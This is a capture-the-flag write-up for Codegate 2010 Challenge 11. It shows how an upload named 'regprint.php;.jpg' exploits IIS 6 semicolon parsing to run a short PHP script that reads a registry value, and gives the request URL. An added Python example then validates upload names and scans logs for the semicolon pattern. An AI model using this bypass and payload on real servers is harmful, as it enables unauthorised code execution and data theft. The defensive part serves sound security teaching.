Codegate 2010 Challenge 11 writeup
Get a value of HKLM\Software\codegate2010, it’s the flag.
When first accessing the URL, it shows a page that lets you upload a JPEG image, and only .jpg files are accepted. I noticed it is served by IIS, which reminded me of the IIS vulnerability in how file names of uploaded images are processed (the semicolon trick). A little googling showed the result. Aha, let's test it by uploading a PHP file named "test.php;.jpg". Incredible!
Now the only thing we have to do is write a few lines of PHP to read the registry key.
regprint.php;.jpg

<?php
// Instantiate the Windows Script Host shell via COM (needs PHP's COM extension on Windows).
$shell = new COM("WScript.Shell") or die("Requires Windows Scripting Host");
// Read the flag stored as the value HKLM\SOFTWARE\codegate2010.
$devenvpath = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\codegate2010");
echo $devenvpath;
?>

Then execute it by requesting http://ctf6.codegate.org/31337_/upload/regprint.php;.jpg
Easy game for 1200 points.
In fact, after the game thaidn said it was a fault in deploying the challenge: it was designed to be solved with a 0-day in core PHP.
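The filter in this challenge accepted "regprint.php;.jpg" because it only looked at the trailing ".jpg", while IIS 6 stopped parsing at the ";" and handed the file to the PHP handler. The block below is an added example written for this writeup, not code from the challenge or from the author; it shows the two checks a defender would want: an upload validator that accepts only a single plain JPEG name and never stores the file under the client-chosen name, and a scan over IIS-style log lines for request paths with a script extension followed by ";". The function names, the sample JPEG bytes and the log lines (in a simplified W3C layout) are all constructed for the example.

```python
import hashlib
import re

# Added example (not part of the original writeup): a defensive upload check and a
# log scan for the IIS semicolon trick. All names and sample data here are constructed.

# Only plain JPEG names are accepted: one basename, one extension, no ';', no second dot.
SAFE_JPEG_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(?:jpg|jpeg)$", re.IGNORECASE)
JPEG_MAGIC = b"\xff\xd8\xff"

# Request paths where a script extension is immediately followed by ';' -- the shape
# that IIS 6 executed as a script while an extension filter only saw ".jpg".
SEMICOLON_SCRIPT = re.compile(r"\S*\.(?:php|asp|aspx);\S*", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, stored_name_or_reason).

    The client-supplied name is used only to decide acceptance; the stored name is
    derived from the content hash, so nothing the client chose reaches the filesystem.
    """
    # Strip any directory part, whether Windows or POSIX separators were used.
    base = re.split(r"[\\/]", filename)[-1]
    if not SAFE_JPEG_NAME.fullmatch(base):
        return False, "filename rejected"
    # Cheap content check: a JPEG starts with the SOI marker FF D8 FF.
    if not data.startswith(JPEG_MAGIC):
        return False, "content is not a JPEG"
    stored = hashlib.sha256(data).hexdigest()[:16] + ".jpg"
    return True, stored


def find_semicolon_requests(log_text: str) -> list[str]:
    """Return the request paths in W3C-style IIS log lines that carry the ';' trick."""
    hits = []
    for line in log_text.splitlines():
        if line.startswith("#") or not line.strip():
            continue  # skip W3C header lines and blanks
        m = SEMICOLON_SCRIPT.search(line)
        if m:
            hits.append(m.group(0))
    return hits


# Constructed sample data: a minimal JPEG header and a PHP payload disguised as an image.
JPEG_SAMPLE = JPEG_MAGIC + b"\xe0" + b"\x00" * 32
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"

# Constructed log lines (simplified W3C layout); the /31337_/upload/ path is the one in the writeup.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2010-03-13 10:00:01 10.0.0.5 GET /31337_/upload/photo.jpg - 80 203.0.113.7 200
2010-03-13 10:00:09 10.0.0.5 GET /31337_/upload/regprint.php;.jpg - 80 203.0.113.7 200
2010-03-13 10:01:00 10.0.0.5 POST /31337_/upload.php - 80 203.0.113.7 200
"""

if __name__ == "__main__":
    for name, data in [("photo.jpg", JPEG_SAMPLE), ("regprint.php;.jpg", JPEG_SAMPLE),
                       ("..\\photo.jpg", JPEG_SAMPLE), ("photo.jpg", PHP_SAMPLE)]:
        print(name, "->", check_upload(name, data))
    print(find_semicolon_requests(SAMPLE_LOG))
```

The real fix for the parsing bug lives in IIS itself, but the application-side rules hold regardless of web server: never reuse a client-chosen file name, require the whole name (not just its tail) to match the expected pattern, check the content rather than trusting the extension, and keep the upload directory free of script handlers so that even a misnamed file is served as static data.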
- Keywords: IIS, semi-colon vulnerability